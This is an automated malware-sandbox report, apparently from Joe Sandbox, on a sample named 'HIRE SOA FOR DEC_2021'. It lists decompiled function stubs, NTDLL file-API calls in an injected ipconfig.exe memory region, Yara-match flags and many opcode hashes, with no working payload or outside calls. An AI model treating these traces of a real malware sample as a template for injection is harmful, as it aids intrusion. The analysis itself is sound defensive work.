Function 00418932 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00418932(int _a4) {
				intOrPtr _v0;
				void* _t11;
				void* _t18;

				_push(0x83ef6368);
				asm("adc ebp, [ebx+0x18b1f879]");
				_t6 = _v0;
				E004191F0(_t11, _t18, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}

0x00418932
0x00418937
0x00418943
0x0041895a
0x00418968

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 394d0470e74ef8a371b8b56b19988b22a63833040dc654ca6dd7afb5b033162e
Instruction ID: bb01ce1ff513c3bc84693e456d648c14e2d492e9c4305298a6d5ad2c0abffc65
Opcode Fuzzy Hash: 394d0470e74ef8a371b8b56b19988b22a63833040dc654ca6dd7afb5b033162e
Instruction Fuzzy Hash: 65E04635600244ABDA20DF28CC95ED33B68AF58350F0586A8B9699B342D531AA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B8967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B89694

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 395a72621767e8b0b126ca7bf27c89a7ed149b05144a11969b6b9f2012d98680
Instruction ID: d3066c5ecfed51ce5fe7a5da8ffef0790fabcef652804822f0353910e0c972e6
Opcode Fuzzy Hash: 395a72621767e8b0b126ca7bf27c89a7ed149b05144a11969b6b9f2012d98680
Instruction Fuzzy Hash: E6B09B729014C5C5DF11E76147087377D50F7D0741F16C0B5D1020641A4778C491F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B898A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d57d19f1e9563853dd6dda94331431e781a64e12ba64d1af4f968f6e2c5753b
Instruction ID: c96bf7fc4d6622bdd3c1b28c17043f9549b88bf4ecec9bb82f322f3e7b09ca81
Opcode Fuzzy Hash: 1d57d19f1e9563853dd6dda94331431e781a64e12ba64d1af4f968f6e2c5753b
Instruction Fuzzy Hash: E290026230100402D602615A45146060459D7D1385F91C076E1414555D86658D63F172

Uniqueness

Uniqueness Score: -1.00%

Function 00B89820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81536f841e035a65d73cc0e1cb5f587089ab64afe466a947057608ea5462e1ef
Instruction ID: caa0c4e6853a26e002b9ffa5c326796065693f047e13cbedb1bd0e19b12bef52
Opcode Fuzzy Hash: 81536f841e035a65d73cc0e1cb5f587089ab64afe466a947057608ea5462e1ef
Instruction Fuzzy Hash: 1F90027224100402D641715A45046060459E7D0381F91C076A0414554E86958E66FAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f01e1346c6b0326ea80391b001db6c1517f6da387c7112190d87e3519b9dc5
Instruction ID: 02f9d04f197775ca2277d866018914c71122d3dcb764d80f969c744daf7f1d5e
Opcode Fuzzy Hash: 19f01e1346c6b0326ea80391b001db6c1517f6da387c7112190d87e3519b9dc5
Instruction Fuzzy Hash: 189002A2601140434A40B15A49044065465E7E1341391C175A0444560C86A88C65E2B5

Uniqueness

Uniqueness Score: -1.00%

Function 00B899D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed99d5e2c6aa166097e19da4e7df398b16954e4da25903f62c25130603944ed
Instruction ID: 970a11bec77ba370d14f886b0ee3e5a9902ac1657510fb785ac6d1c6480e56d7
Opcode Fuzzy Hash: eed99d5e2c6aa166097e19da4e7df398b16954e4da25903f62c25130603944ed
Instruction Fuzzy Hash: 579002A221100042D604615A45047060495D7E1341F51C076A2144554CC5698C71A175

Uniqueness

Uniqueness Score: -1.00%

Function 00B89950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57632b86252462f3e0e6c28d04f76b66c0a01432449fd50be6088d41f6533d87
Instruction ID: b1f1c85042607db80d0f938fc02d6f6c0316d1d692add33d9f4629ef6687c2c2
Opcode Fuzzy Hash: 57632b86252462f3e0e6c28d04f76b66c0a01432449fd50be6088d41f6533d87
Instruction Fuzzy Hash: 259002A220140403D640655A49046070455D7D0342F51C075A2054555E8A698C61B175

Uniqueness

Uniqueness Score: -1.00%

Function 00B89A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb232f718a12a311fd0b8efc90376585106cb0d109ff7fa8400cbbc7f3a56ce0
Instruction ID: 48bbed5a30398dd3a7e753f7f335fe82f85e853ccf44fc72cbb1c906f304f4df
Opcode Fuzzy Hash: fb232f718a12a311fd0b8efc90376585106cb0d109ff7fa8400cbbc7f3a56ce0
Instruction Fuzzy Hash: F390026220144442D640625A4904B0F4555D7E1342F91C07DA4146554CC9558C65A771

Uniqueness

Uniqueness Score: -1.00%

Function 00B89A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54f18a88f6ce98cfec5e6d9d89d2ada298eb7131a34353cb68e7f0574065c3b
Instruction ID: ffc0ba25b232750ec1301694f8fe724e1b0dc2440aeccaef2a5402d4f248b34c
Opcode Fuzzy Hash: b54f18a88f6ce98cfec5e6d9d89d2ada298eb7131a34353cb68e7f0574065c3b
Instruction Fuzzy Hash: 3390027220140402D600615A49087470455D7D0342F51C075A5154555E86A5CCA1B571

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac18fa4f2dfe3401da84ff3e3836e4b772243d45c003eefacdba3f982c26211
Instruction ID: 0f8030596b7da51dc58e17f2696a62f6bc16238e669acb4b5945ad75b8a63e3a
Opcode Fuzzy Hash: 3ac18fa4f2dfe3401da84ff3e3836e4b772243d45c003eefacdba3f982c26211
Instruction Fuzzy Hash: DC90027220144002D640715A854460B5455E7E0341F51C475E0415554C86558C66E271

Uniqueness

Uniqueness Score: -1.00%

Function 00B89B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4732f9f5dcc247cbb16022e13802fb50d0df67a38e9926a2280406315b41b0de
Instruction ID: 6d3cd407a1ab5b47b944ed2c58d2f37b7de9ec4b79020c9975d915679c4689a2
Opcode Fuzzy Hash: 4732f9f5dcc247cbb16022e13802fb50d0df67a38e9926a2280406315b41b0de
Instruction Fuzzy Hash: C990026224100802D640715A85147070456D7D0741F51C075A0014554D86568D75B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B895F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883881d35d2d3c8191e25cb5cd1019784b3fdb0b2c09f49be4b7e268e648ebfe
Instruction ID: a0ebcbfa033e1147c57aea6f74b9056e86caebebd6f46c37d072fa7f1a387fec
Opcode Fuzzy Hash: 883881d35d2d3c8191e25cb5cd1019784b3fdb0b2c09f49be4b7e268e648ebfe
Instruction Fuzzy Hash: 0390027220100802D604615A49046860455D7D0341F51C075A6014655E96A58CA1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88a5829042b847528ab25d9ae34c5273e890cec0e479e9dab092a1216dee39a
Instruction ID: 7b6f1a9c6249423486d2df5460764c5805d43b1e5bae73088505df5472662417
Opcode Fuzzy Hash: c88a5829042b847528ab25d9ae34c5273e890cec0e479e9dab092a1216dee39a
Instruction Fuzzy Hash: B3900272A05000129640715A49146464456E7E0781B55C075A0504554C89948E65A3F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B89520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4537e6b32765d23f3059050bd385e08d904aacc3332948cbd503b43188bd7ab1
Instruction ID: d96aef3ef0385b135e386eef67517a54439dc64efba275beaf96c1241c6e6e0e
Opcode Fuzzy Hash: 4537e6b32765d23f3059050bd385e08d904aacc3332948cbd503b43188bd7ab1
Instruction Fuzzy Hash: F19002E2201140924A00A25A8504B0A4955D7E0341B51C07AE1044560CC5658C61E175

Uniqueness

Uniqueness Score: -1.00%

Function 00B89560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed14c58c804d128183b51f5edbefda84e1c2774de2085607fdf38cb4242dbcf
Instruction ID: 8062a5ca6c838a647228044cda572cd4df52899910a816a87412e23bd215b809
Opcode Fuzzy Hash: 2ed14c58c804d128183b51f5edbefda84e1c2774de2085607fdf38cb4242dbcf
Instruction Fuzzy Hash: 0D900266221000020645A55A070450B0895E7D6391391C079F1406590CC6618C75A371

Uniqueness

Uniqueness Score: -1.00%

Function 00B896D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b2b2d3821e9201007c7cc2ca52bbe3868a1d6e3fec19e976f8f19bba8ed728
Instruction ID: c67f63022eb99ecfa6b5c21d8e425563ab3b2e943f82babc7798106ff686b477
Opcode Fuzzy Hash: 97b2b2d3821e9201007c7cc2ca52bbe3868a1d6e3fec19e976f8f19bba8ed728
Instruction Fuzzy Hash: E990027220100842D600615A4504B460455D7E0341F51C07AA0114654D8655CC61B571

Uniqueness

Uniqueness Score: -1.00%

Function 00B89610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754699af6d7d4931e1c0ef6885fc37f3b99960762a81896adb452c1978524432
Instruction ID: 72bfef220a71b54a20d9c2438829b72ae910fd0fa17924bf7c1b319934abaa9f
Opcode Fuzzy Hash: 754699af6d7d4931e1c0ef6885fc37f3b99960762a81896adb452c1978524432
Instruction Fuzzy Hash: 8D90027260500802D650715A45147460455D7D0341F51C075A0014654D87958E65B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B89650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8d229b9b64a3833efe9bdd3d1bb96520adf18701f20843da8059b16b5af550
Instruction ID: 02b81f70ba18a464938b688968a949c87b86a5cc7e62da06c2e65036c6f8e5c9
Opcode Fuzzy Hash: 3e8d229b9b64a3833efe9bdd3d1bb96520adf18701f20843da8059b16b5af550
Instruction Fuzzy Hash: 0A90027220504842D640715A4504A460465D7D0345F51C075A0054694D96658D65F6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00B89730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569f44369e1fb3b46c8fd1e76ec8ac86c72df12bafa0b3e921a75085a3e7d0a7
Instruction ID: 212d6041a8af559a892422508c17ad6bbfc6a75ecb59b94ce492c0270e86519e
Opcode Fuzzy Hash: 569f44369e1fb3b46c8fd1e76ec8ac86c72df12bafa0b3e921a75085a3e7d0a7
Instruction Fuzzy Hash: 5490026260500402D640715A55187060465D7D0341F51D075A0014554DC6998E65B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1739023725fca321bca730486d67f700e4f59997b95a702d83ef29794baa624a
Instruction ID: 6886db7c408c593cace029934dd6827b224b5fe8defb14a73f14ec34cc472bd2
Opcode Fuzzy Hash: 1739023725fca321bca730486d67f700e4f59997b95a702d83ef29794baa624a
Instruction Fuzzy Hash: B2900272301000529A00A69A5904A4A4555D7F0341B51D079A4004554C85948C71A171

Uniqueness

Uniqueness Score: -1.00%

Function 00B89770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1dd67049aa5102cc28897a6ae9155de9b5bfa91d233c7bfad68be3216151341
Instruction ID: 6dffa371d213bba8507d95430410c500c2695f5d89018863e59f2d1856b39792
Opcode Fuzzy Hash: e1dd67049aa5102cc28897a6ae9155de9b5bfa91d233c7bfad68be3216151341
Instruction Fuzzy Hash: 4190026220504442D600655A5508A060455D7D0345F51D075A1054595DC6758C61F171

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac75146e8767bf7c94b64c4dcd9ef517ab2b72ae71add10dcba91dbb95b7a17c
Instruction ID: 9482da802db1b6e3fd07e9da4758b0568e04edb5480243a745db5c2028bfcdbc
Opcode Fuzzy Hash: ac75146e8767bf7c94b64c4dcd9ef517ab2b72ae71add10dcba91dbb95b7a17c
Instruction Fuzzy Hash: 4C90027620504442DA00655A5904A870455D7D0345F51D475A041459CD86948C71F171

Uniqueness

Uniqueness Score: -1.00%

Function 00B89760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d8b77cb08d0342634d4a9a1d2b6601dd3699111d02253dd86266d74ace36ef
Instruction ID: d3a27ba0e7323e2a0a91eaa99bd07ada09d288d691a167874c2fc4ec979f1df5
Opcode Fuzzy Hash: b5d8b77cb08d0342634d4a9a1d2b6601dd3699111d02253dd86266d74ace36ef
Instruction Fuzzy Hash: 3C90027220100403D600615A56087070455D7D0341F51D475A0414558DD6968C61B171

Uniqueness

Uniqueness Score: -1.00%

Function 00B89670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 1ef618a07cf5b9ef695026f52e5882db6b66056445a64164d8564b70abd26ee2
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00BDFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00BDFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00BD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00BD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00bdfdda
0x00bdfde2
0x00bdfde5
0x00bdfdec
0x00bdfdfa
0x00bdfdff
0x00bdfe0a
0x00bdfe0f
0x00bdfe17
0x00bdfe1e
0x00bdfe19
0x00bdfe19
0x00bdfe19
0x00bdfe20
0x00bdfe21
0x00bdfe22
0x00bdfe25
0x00bdfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BDFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00BDFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00BDFE2B

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 3c3595d820c69c539779bd35bae6b6f916d972abdb54aed13c92acdf0a0b158e
Instruction ID: 3fa3535d221006937c5c713422e749acae9584ee1abff2ba991175e7c1ab49b7
Opcode Fuzzy Hash: 3c3595d820c69c539779bd35bae6b6f916d972abdb54aed13c92acdf0a0b158e
Instruction Fuzzy Hash: 1DF0C272204601BBD6241A45DC02F23BB9AEB44730F244295F628562E1EA62FC2097B0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ipconfig.exePID: 5252, Parent PID: 3424COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	690
Total number of Limit Nodes:	81

Executed Functions

Function 026585F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02653BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02653BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0265863D

Strings

.z`, xrefs: 0265862D, 02658638

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 9bed69790fe2724b58e976fc2f3b80c7a245174f0270c6e738614ed31753fb10
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 59F0BDB2201208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0265869A Relevance: 1.5, APIs: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(02653D82,5E972F65,FFFFFFFF,02653A41,?,?,02653D82,?,02653A41,FFFFFFFF,5E972F65,02653D82,?,00000000), ref: 026586E5

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0035a3cc45db9681f840a5793ada7c69172bf5e94fa6a59ac074d298e784b440
Instruction ID: ec2237ee531b5d8899869f24c01f4cc72a8a18f5c5bfe3b80f39d4fa7fc442b5
Opcode Fuzzy Hash: 0035a3cc45db9681f840a5793ada7c69172bf5e94fa6a59ac074d298e784b440
Instruction Fuzzy Hash: 7FF014B2200118AFDB18DF98DC90DEB77ADEF8C358F128249BE0CD3241C631E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 026586A0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02653D82,5E972F65,FFFFFFFF,02653A41,?,?,02653D82,?,02653A41,FFFFFFFF,5E972F65,02653D82,?,00000000), ref: 026586E5

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 6e09501e71e8762fefa4dd2e7f7104f0d43760b2e84cad861b715a072d99e172
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 62F0A4B2200218ABCB14DF99DC84EEB77ADAF8C754F158248BE1D97241D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0265871A Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02653D60,?,?,02653D60,00000000,FFFFFFFF), ref: 02658745

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9d49b5e1822b11427fa488248a99700e7f3e3456be9d8d3cc01968f7e87fad14
Instruction ID: 0bbe400190901a9ef9fc452fd40d4c6608e5fc7035b6098aa74d2c8fa0013ccd
Opcode Fuzzy Hash: 9d49b5e1822b11427fa488248a99700e7f3e3456be9d8d3cc01968f7e87fad14
Instruction Fuzzy Hash: 83E08676600214BBD711EFD8CC84EDB7769EF44750F104569F91C9B242D630E6018AD0

Uniqueness

Uniqueness Score: -1.00%

Function 02658720 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02653D60,?,?,02653D60,00000000,FFFFFFFF), ref: 02658745

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 8807ec678fc9c21ab0ddef1deb05583e320fc08d86be229bfe344001bec22c97
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: A2D01275200214ABD710EB98CC85E97775DEF44750F154459BE185B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02D89A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D89A5A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

